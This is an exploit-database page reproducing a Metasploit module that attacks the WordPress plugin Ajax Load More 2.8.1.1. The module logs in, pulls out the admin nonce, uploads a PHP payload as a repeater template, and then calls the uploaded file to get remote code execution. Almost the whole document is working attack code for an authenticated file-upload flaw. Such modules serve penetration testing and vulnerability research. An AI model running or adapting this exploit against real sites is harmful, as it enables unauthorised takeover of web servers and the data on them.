WordPress Plugin Ajax Load More 2.8.1.1 – PHP Upload (Metasploit)

  • 作者: Metasploit
    日期: 2015-11-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38660/
  • ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'msf/core'
    
    class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
    
    include Msf::Exploit::Remote::HTTP::Wordpress
    include Msf::Exploit::FileDropper
    
    def initialize(info = {})
    super(update_info(info,
    'Name' => 'Wordpress Ajax Load More PHP Upload Vulnerability',
    'Description'=> %q{
    This module exploits an arbitrary file upload in the WordPress Ajax Load More
    version 2.8.1.1. It allows to upload arbitrary php files and get remote code
    execution. This module has been tested successfully on WordPress Ajax Load More
    2.8.0 with WordPress 4.1.3 on Ubuntu 12.04/14.04 Server.
    },
    'Author' =>
    [
    'Unknown', # Identify yourself || send an PR here
    'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
    ],
    'License'=> MSF_LICENSE,
    'References' =>
    [
    ['WPVDB', '8209']
    ],
    'Privileged' => false,
    'Platform' => 'php',
    'Arch' => ARCH_PHP,
    'Targets'=> [['Ajax Load More 2.8.1.1', {}]],
    'DisclosureDate' => 'Oct 10 2015',
    'DefaultTarget'=> 0
    ))
    
    register_options(
    [
    OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
    OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
    ], self.class
    )
    end
    
    def check
    check_plugin_version_from_readme('ajax-load-more', '2.8.1.2')
    end
    
    def username
    datastore['WP_USERNAME']
    end
    
    def password
    datastore['WP_PASSWORD']
    end
    
    def get_nonce(cookie)
    res = send_request_cgi(
    'method'=> 'GET',
    'uri' => normalize_uri(wordpress_url_backend, 'admin.php'),
    'vars_get'=> {
    'page'=> 'ajax-load-more-repeaters'
    },
    'cookie'=> cookie
    )
    
    if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
    return Regexp.last_match[1]
    else
    return nil
    end
    end
    
    def exploit
    vprint_status("#{peer} - Trying to login as #{username}")
    cookie = wordpress_login(username, password)
    fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?
    
    vprint_status("#{peer} - Trying to get nonce")
    nonce = get_nonce(cookie)
    fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?
    
    vprint_status("#{peer} - Trying to upload payload")
    
    # This must be default.php
    filename = 'default.php'
    
    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
    'method'=> 'POST',
    'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
    'vars_post' => {
    'action'=> 'alm_save_repeater',
    'value' => payload.encoded,
    'repeater'=> 'default',
    'type'=> 'default',
    'alias' => '',
    'nonce' => nonce
    },
    'cookie'=> cookie
    )
    
    if res
    if res.code == 200 && res.body.include?('Template Saved Successfully')
    register_files_for_cleanup(filename)
    else
    fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
    end
    else
    fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
    
    print_status("#{peer} - Calling uploaded file")
    send_request_cgi(
    'uri'=> normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
    end
    end